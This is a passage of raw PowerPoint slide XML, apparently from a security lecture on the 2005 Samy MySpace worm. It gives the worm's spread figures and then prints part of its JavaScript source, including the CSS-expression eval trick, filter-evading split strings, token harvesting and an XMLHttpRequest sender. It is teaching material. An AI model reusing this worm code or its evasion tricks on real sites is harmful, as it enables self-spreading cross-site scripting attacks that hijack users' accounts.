              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>” was adding 1,000 friends per second at peak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>5 hours later: 1,005,831 friends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94214" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4056815-A1E9-5E4C-8982-B6698A9D991C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10217427" y="4081807"/>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6140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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346B22E8-44D6-654F-B58D-E5A327A40AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Code of the MySpace Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95237" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF9553-4550-A549-A1C7-28E52C147C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1166125" y="1609203"/>
            <a:ext cx="976573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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;div id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mycode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> style="BACKGROUND: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>script:eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.all.mycode.expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)')" expr="var B=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(34);var A=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(39);function g(){var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>C;try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>{var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>D=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.body.createTextRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();C=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>D.htmlText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>}catch(e){}if(C){return C}else{return eval('document.body.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>inne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>')}}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>{M=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');L=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>')}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getQueryParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){var E=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.location.search;var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>F=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>E.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1,E.length).split('&amp;');var AS=new Array();for(var O=0;O&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>F.length;O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J;var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AS=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getQueryParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();var L=AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'];var M=AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'];if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>profile.myspace.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='http://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>www.myspace.com'+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.pathname+location.search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>}else{if(!M){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(g())}main()}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getClientFID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>findIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(g(),'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>up_launchIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>( '+A,A)}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>function nothing(){}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>paramsToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AV){var N=new String();var O=0;for(var P in AV){if(O&gt;0){N+='&amp;'}var Q=escape(AV[P]);while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Q.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('+')!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=-1){Q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Q.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('+','%2B')}while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Q.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('&amp;')!=-1){Q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Q.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('&amp;','%26')}N+=P+'='+Q;O++}return N}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>httpSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BH,BI,BJ,BK){if(!J){return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>false}eval('J.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=BI');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BJ,BH,true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);if(BJ=='POST'){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
